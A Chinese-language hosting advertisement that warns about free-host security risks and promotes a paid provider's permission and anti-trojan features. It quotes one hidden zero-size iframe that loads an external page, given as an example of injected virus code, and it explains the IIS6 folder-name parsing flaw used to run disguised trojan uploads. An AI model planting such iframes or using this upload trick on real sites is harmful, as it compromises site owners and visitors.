免費主機，免費的誘惑，風險的開始

   免費空間里是否經(jīng)常有人到論壇發(fā)些廣告信息而感到煩惱？這時，收費高防空間的作用產(chǎn)生了，可以明確拒絕或授權(quán)某些IP地址對網(wǎng)站的訪問。對某些重要的子目錄，如論壇的后臺管理目錄/admin/可以設(shè)置為所有人拒絕訪問，只允許自己的ip訪問.這樣即使黑客知道了論壇的超級管理密碼，也無法對論壇進行管理和破壞。重要文件還可設(shè)置保護，當文件被保護之后，該文件將無法從web訪問�？梢允褂迷摴δ軄肀Ｗo重要文件的安全性，比如ACCESS數(shù)據(jù)庫等。而免費空間不具備這樣的功能呢，一般免費空間還帶有不同的廣告，要求站長不能刪除廣告。

  使用免費主機是否擔心被黑客攻擊網(wǎng)站導(dǎo)致癱瘓？通常用戶網(wǎng)站被黑（如網(wǎng)頁被篡改,文件被盜，被刪等）都是因為黑客通過網(wǎng)站的文件上傳功能將asp/php木馬上傳到空間并運行造成的。所以在無法確認免費虛擬主機空間的系統(tǒng)是否存在上傳漏洞的情況下，而西部數(shù)碼云主機可以控制目錄權(quán)限只要保證文件上傳目錄沒有腳本運行權(quán)限，那么即便黑客將木馬上傳到空間也無法運行,這樣就無法危及網(wǎng)站。  

   如果網(wǎng)站存在上傳漏洞或注入漏洞，很容易被黑客上傳木馬，添加病毒代碼。查看網(wǎng)頁源代碼，會發(fā)現(xiàn)病毒代碼一般是：<iframe src=http://www.haogs.cn/m.htm width=0 height=0></iframe>等，而黑客通常會在網(wǎng)站里面留下后門程序，如海洋頂端asp木馬，以便日后再次侵入網(wǎng)站。使用西部數(shù)碼提供的“病毒查殺”功能，可以批量清除木馬代碼，省去了先下載，再手工刪除，再上傳的麻煩，并且將這些病毒木馬一網(wǎng)打盡。

    因為系統(tǒng)層出不窮的上傳漏洞、注入漏洞、Win2003本身的設(shè)計缺陷，導(dǎo)致目前國內(nèi)大多數(shù)的中小網(wǎng)站都存在或多或少的安全問題。加之很多網(wǎng)站管理員的安全水平有限，目前網(wǎng)頁病毒木馬非常猖獗。作為一家中小企業(yè)有必要搭建起一個管理企業(yè)網(wǎng)絡(luò)的技術(shù)服務(wù)平臺，以適應(yīng)企業(yè)實現(xiàn)與國際競爭接軌、實現(xiàn)網(wǎng)絡(luò)化和信息化的要求。當然，這也是日漸激烈的市場競爭，對中小企業(yè)“網(wǎng)管”的時代要求，而免費空間不具備這樣的實力，一般沒有保障

掛羊頭賣狗肉的免費實際很麻煩！

    現(xiàn)在免費的主頁空間已經(jīng)很難找了，大多已經(jīng)是停止新的注冊的，而且免費的主頁大多會有許多限制，比如在空間，上傳，訪問量上等 等。很多人認為是在網(wǎng)站完成的差不多的時候，最好能找到一個免費的主頁空間來測試自己的網(wǎng)站，比如連接啊，效果啊等等，到真正完成的時候再找一個付費的，這樣的想法是不錯，但是目前的免費虛擬主機也實際很少，還有打折AA免費云主機的幌子實際上只是為了賺取訪問點擊率。

　　下面的內(nèi)容只是我在建設(shè)我自己的和公司網(wǎng)站中關(guān)于免費虛擬空間 （IDC）選擇的一些心得，都是付費的，如果你打算還是選擇免費的虛擬空間的話，還是到互聯(lián)網(wǎng)上搜索一下，或者是到論壇里面去問一些老鳥吧。

免費主機的安全問題

　　Windows 2003 Enterprise Edition是微軟目前主流的服務(wù)器操作系統(tǒng)。 Windows 2003 IIS6 存在著文件解析路徑的漏洞，當文件夾名為類似hack.asp的時候（即文件夾名看起來像一個ASP文件的文件名），此時此文件夾下的任何類型的文件(比如.gif，.jpg，.txt等)都可以在IIS中被當做ASP程序來執(zhí)行。這樣黑客即可上傳擴展名為jpg或gif之類的看起來像是圖片文件的木馬文件，通過訪問這個文件即可運行木馬。因為微軟尚未發(fā)布這個漏洞的補丁，所以幾乎所有網(wǎng)站都會存在這個漏洞。經(jīng)測試，這個問題不限于asp,甚至php, CGI等都存在這種問題。

西部數(shù)碼多重安全保障解決漏洞問題

    目前國內(nèi)大部分的網(wǎng)站都是運行在IIS6下，如果這些網(wǎng)站中有任何一個文件夾的名字是以 .asp .php .cer .asa .cgi .pl 等結(jié)尾，那么放在這些文件夾下面的任何類型的文件都有可能被認為是腳本文件而交給腳本解析器而執(zhí)行，如果黑客將一個 hack.asp 文件改名為 hack.gif 上傳到這些目錄中，那么不堪設(shè)想。據(jù)悉，西部數(shù)碼(http://www.bingfeng168.cn)利用其技術(shù)優(yōu)勢，推出10重安全保障的虛擬主機，讓菜鳥不再被木馬困擾。 http://www.bingfeng168.cn/AboutUs/ClearVirus.asp

   一，Stream開關(guān)可自由設(shè)置，ASP中的ADODB.Stream 對象用來操作二進制或文本數(shù)據(jù)的流。通常用于無組件上傳和驗證碼等功能。關(guān)閉該組件可以提高網(wǎng)站安全。 Fso開關(guān)也可自由設(shè)置，F(xiàn)SO(FileSystemObject)是微軟ASP的一個對文件操作的控件，該控件可以對服務(wù)器進行讀取、新建、修改、刪除目錄以及文件的操作。關(guān)閉該組件有利于提高網(wǎng)站安全。 

　 二，假設(shè)網(wǎng)站建好后，今后一段時間都不會再用到ftp上傳功能，這時可以暫時關(guān)閉FTP上傳，有助于提高網(wǎng)站的安全，即使ftp密碼泄露，黑客也不能操作空間內(nèi)的文件，設(shè)置后60秒后生效。 

　 三，另外還可設(shè)置腳本權(quán)限與寫入權(quán)限，如果網(wǎng)站只使用了asp，可設(shè)置為只開放asp權(quán)限。這樣黑客即使上傳了php的木馬到空間也不能運行，最少的權(quán)限＝最大的安全。寫入權(quán)限設(shè)置則系統(tǒng)支持全國領(lǐng)先的目錄權(quán)限設(shè)置，允許關(guān)閉網(wǎng)站的寫入權(quán)限，鎖定虛擬主機。對安全有重要意義，例如可以將access數(shù)據(jù)庫放在databases目錄，而將wwwroot目錄的寫入 權(quán)限關(guān)閉，令asp木馬根本無法上傳，這樣比關(guān)閉FSO更安全。

虛擬主機首選西部數(shù)碼：http://www.bingfeng168.cn/services/webhosting/ 

標簽： idc 安全 代碼 服務(wù)器 服務(wù)器操作系統(tǒng) 互聯(lián)網(wǎng) 腳本 漏洞 免費虛擬空間 免費虛擬主機 免費虛擬主機空間 企業(yè) 權(quán)限 數(shù)據(jù)庫 搜索 網(wǎng)絡(luò) 網(wǎng)站 問題 西部數(shù)

版權(quán)申明：本站文章部分自網(wǎng)絡(luò)，如有侵權(quán)，請聯(lián)系：west999com@outlook.com
特別注意：本站所有轉(zhuǎn)載文章言論不代表本站觀點！
本站所提供的圖片等素材，版權(quán)歸原作者所有，如需使用，請與原作者聯(lián)系。